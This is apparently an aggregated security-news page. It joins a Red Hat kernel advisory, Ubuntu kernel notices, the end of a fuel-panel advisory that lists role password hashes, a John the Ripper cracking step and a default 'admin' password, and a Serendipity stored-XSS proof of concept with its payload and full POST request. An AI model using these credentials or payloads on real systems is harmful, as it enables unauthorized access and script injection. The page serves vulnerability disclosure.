<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>  
    <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>  
    <ROLE_LIST>  
        <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>  
        <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>  
        <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>  
    </ROLE_LIST>

Step 4 : attacker can crack the hashesh using john the ripper 

notice : most of the panels password is : admin

Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.

Franklin Fueling Systems TS-550 Hash Disclosure / Default Credentials

Red Hat Security Advisory 2023-1822-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:1822-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1822  
Issue date:        2023-04-18  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6  
Extended Lifecycle Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server (v. 6 ELS) - i386, noarch, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 6 ELS) - i386, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server (v. 6 ELS):

Source:  
kernel-2.6.32-754.50.1.el6.src.rpm

i386:  
kernel-2.6.32-754.50.1.el6.i686.rpm  
kernel-debug-2.6.32-754.50.1.el6.i686.rpm  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debug-devel-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-common-i686-2.6.32-754.50.1.el6.i686.rpm  
kernel-devel-2.6.32-754.50.1.el6.i686.rpm  
kernel-headers-2.6.32-754.50.1.el6.i686.rpm  
perf-2.6.32-754.50.1.el6.i686.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm

noarch:  
kernel-abi-whitelists-2.6.32-754.50.1.el6.noarch.rpm  
kernel-doc-2.6.32-754.50.1.el6.noarch.rpm  
kernel-firmware-2.6.32-754.50.1.el6.noarch.rpm

s390x:  
kernel-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debug-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debug-devel-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debuginfo-common-s390x-2.6.32-754.50.1.el6.s390x.rpm  
kernel-devel-2.6.32-754.50.1.el6.s390x.rpm  
kernel-headers-2.6.32-754.50.1.el6.s390x.rpm  
kernel-kdump-2.6.32-754.50.1.el6.s390x.rpm  
kernel-kdump-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
kernel-kdump-devel-2.6.32-754.50.1.el6.s390x.rpm  
perf-2.6.32-754.50.1.el6.s390x.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.s390x.rpm

x86_64:  
kernel-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debug-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debug-devel-2.6.32-754.50.1.el6.i686.rpm  
kernel-debug-devel-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debuginfo-common-i686-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-common-x86_64-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-devel-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-headers-2.6.32-754.50.1.el6.x86_64.rpm  
perf-2.6.32-754.50.1.el6.x86_64.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6 ELS):

i386:  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
kernel-debuginfo-common-i686-2.6.32-754.50.1.el6.i686.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm  
python-perf-2.6.32-754.50.1.el6.i686.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.i686.rpm

s390x:  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
kernel-debuginfo-common-s390x-2.6.32-754.50.1.el6.s390x.rpm  
kernel-kdump-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.s390x.rpm  
python-perf-2.6.32-754.50.1.el6.s390x.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.s390x.rpm

x86_64:  
kernel-debug-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
kernel-debuginfo-common-x86_64-2.6.32-754.50.1.el6.x86_64.rpm  
perf-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm  
python-perf-2.6.32-754.50.1.el6.x86_64.rpm  
python-perf-debuginfo-2.6.32-754.50.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEBU4NzjgjWX9erEAQhy6A//cuOYGY7GXtvxWFdcrGy7Xk9hMEILKVuh  
RGPXfSGHDIsCdpf7o1N4ziIoVS55Qj9H+wYj4CPqpWddQIttGC6tHUfXWrNEvY4S  
Gd9JCsgs+MyGLm85U6bitlj43UJGP5l272Zw87GI2YlHxcsuIUyS0ORqXxjyoUjE  
ppivP2UHP9VAYmocXKGJ+6eH73LZoYsyoQ4pXdH1b09Pdi+5I/YCLtaeCE8hBzJB  
mdc2H145iB3T/ABAVSIWH4wBlx3w0WqbOec1AC60Tgxmmvx6++GQAQFp4VSr8u2U  
XSaXp2ZE5iiOr8+VbJW81UEhpUdTzG1Hsmv35+2pwEyOAPCggGpPQWITelnn/tid  
bINUITshRR2aOd3wpH7tB+wxzNOyOzjtwIc9ERmwSCxofbWEGxD0YjBPA9d1jFrm  
nUtlt3+3Hx8k42yFoJNTCvy3D82EZvQCtGlxQJW5sZA0zeDmbQS1z7Bo9fzGzRSM  
FRmze5Nyab0Qduj2YuJHyj5RFfd+WJjVVAf6/6a1z03NbZv/DwAH2nXM6jh/Osrg  
khe+UXzFe7Tjv79HfFuaVmIcIIgJtDkX9wxCBqgnCTjL0RiXQadh5ya2bu7pcOT0  
0JAmCDF0SBBOqiXC2py3Io+vTV7HbIYyKuo2wcJTTtUAOjPDVi7xkY1JLMnHxEV/  
n+5whzDVH+s=  
=v59E  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1822-01

Ubuntu Security Notice 6030-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6030-1  
April 19, 2023

linux-snapdragon vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-snapdragon: Linux kernel for Qualcomm Snapdragon processors

Details:

It was discovered that the Traffic-Control Index (TCINDEX) implementation  
in the Linux kernel contained a use-after-free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-1281)

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

It was discovered that the infrared transceiver USB driver did not properly  
handle USB control messages. A local attacker with physical access could  
plug in a specially crafted USB device to cause a denial of service (memory  
exhaustion). (CVE-2022-3903)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

It was discovered that the Human Interface Device (HID) support driver in  
the Linux kernel contained a type confusion vulnerability in some  
situations. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-1073)

It was discovered that a memory leak existed in the SCTP protocol  
implementation in the Linux kernel. A local attacker could use this to  
cause a denial of service (memory exhaustion). (CVE-2023-1074)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Lianhui Tang discovered that the MPLS implementation in the Linux kernel  
did not properly handle certain sysctl allocation failure conditions,  
leading to a double-free vulnerability. An attacker could use this to cause  
a denial of service or possibly execute arbitrary code. (CVE-2023-26545)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1148-snapdragon  4.15.0-1148.158  
   linux-image-snapdragon          4.15.0.1148.147

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6030-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-3903,  
   CVE-2022-41218, CVE-2022-47929, CVE-2023-0045, CVE-2023-0266,  
   CVE-2023-0394, CVE-2023-1073, CVE-2023-1074, CVE-2023-1281,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-26545, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1148.158

Ubuntu Security Notice USN-6030-1

Ubuntu Security Notice 6029-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the infrared transceiver USB driver did not properly handle USB control messages. A local attacker with physical access could plug in a specially crafted USB device to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6029-1April 19, 2023linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15,linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm,linux-oracle, linux-raspi2 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-dell300x: Linux kernel for Dell 300x platforms- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi2: Linux kernel for Raspberry Pi systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel contained a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-1281)It was discovered that the infrared transceiver USB driver did not properlyhandle USB control messages. A local attacker with physical access couldplug in a specially crafted USB device to cause a denial of service (memoryexhaustion). (CVE-2022-3903)It was discovered that the Human Interface Device (HID) support driver inthe Linux kernel contained a type confusion vulnerability in somesituations. A local attacker could use this to cause a denial of service(system crash). (CVE-2023-1073)It was discovered that a memory leak existed in the SCTP protocolimplementation in the Linux kernel. A local attacker could use this tocause a denial of service (memory exhaustion). (CVE-2023-1074)Lianhui Tang discovered that the MPLS implementation in the Linux kerneldid not properly handle certain sysctl allocation failure conditions,leading to a double-free vulnerability. An attacker could use this to causea denial of service or possibly execute arbitrary code. (CVE-2023-26545)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1063-dell300x  4.15.0-1063.68   linux-image-4.15.0-1117-oracle  4.15.0-1117.128   linux-image-4.15.0-1130-raspi2  4.15.0-1130.138   linux-image-4.15.0-1138-kvm     4.15.0-1138.143   linux-image-4.15.0-1148-gcp     4.15.0-1148.164   linux-image-4.15.0-1154-aws     4.15.0-1154.167   linux-image-4.15.0-1163-azure   4.15.0-1163.178   linux-image-4.15.0-209-generic  4.15.0-209.220   linux-image-4.15.0-209-generic-lpae  4.15.0-209.220   linux-image-4.15.0-209-lowlatency  4.15.0-209.220   linux-image-aws-lts-18.04       4.15.0.1154.152   linux-image-azure-lts-18.04     4.15.0.1163.131   linux-image-dell300x            4.15.0.1063.62   linux-image-gcp-lts-18.04       4.15.0.1148.162   linux-image-generic             4.15.0.209.192   linux-image-generic-lpae        4.15.0.209.192   linux-image-kvm                 4.15.0.1138.129   linux-image-lowlatency          4.15.0.209.192   linux-image-oracle-lts-18.04    4.15.0.1117.122   linux-image-raspi2              4.15.0.1130.125   linux-image-virtual             4.15.0.209.192Ubuntu 16.04 ESM:   linux-image-4.15.0-1117-oracle  4.15.0-1117.128~16.04.1   linux-image-4.15.0-1148-gcp     4.15.0-1148.164~16.04.1   linux-image-4.15.0-1154-aws     4.15.0-1154.167~16.04.1   linux-image-4.15.0-1163-azure   4.15.0-1163.178~16.04.1   linux-image-4.15.0-209-generic  4.15.0-209.220~16.04.1   linux-image-4.15.0-209-lowlatency  4.15.0-209.220~16.04.1   linux-image-aws-hwe             4.15.0.1154.137   linux-image-azure               4.15.0.1163.147   linux-image-gcp                 4.15.0.1148.138   linux-image-generic-hwe-16.04   4.15.0.209.194   linux-image-gke                 4.15.0.1148.138   linux-image-lowlatency-hwe-16.04  4.15.0.209.194   linux-image-oem                 4.15.0.209.194   linux-image-oracle              4.15.0.1117.98   linux-image-virtual-hwe-16.04   4.15.0.209.194Ubuntu 14.04 ESM:   linux-image-4.15.0-1163-azure   4.15.0-1163.178~14.04.1   linux-image-azure               4.15.0.1163.129After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6029-1   CVE-2022-3903, CVE-2023-1073, CVE-2023-1074, CVE-2023-1281,   CVE-2023-26545Package Information:   https://launchpad.net/ubuntu/+source/linux/4.15.0-209.220   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1154.167   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1163.178   https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1063.68   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1148.164   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1138.143   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1117.128   https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1130.138

Ubuntu Security Notice USN-6029-1

Serendipity version 2.4.0 suffers from a cross site scripting vulnerability.

    Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)Author: Mirabbas AğalarovApplication: SerendipityVersion: 2.4.0Bugs:  Stored XSSTechnology: PHPVendor URL: https://docs.s9y.org/Software Link: https://docs.s9y.org/downloads.htmlDate of found: 13.04.2023Tested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the new entry can do thispayload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3EPOST /serendipity/serendipity_admin.php? HTTP/1.1Host: localhostContent-Length: 730Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1bConnection: closeserendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=12. visit the entry you created

Tag

#linux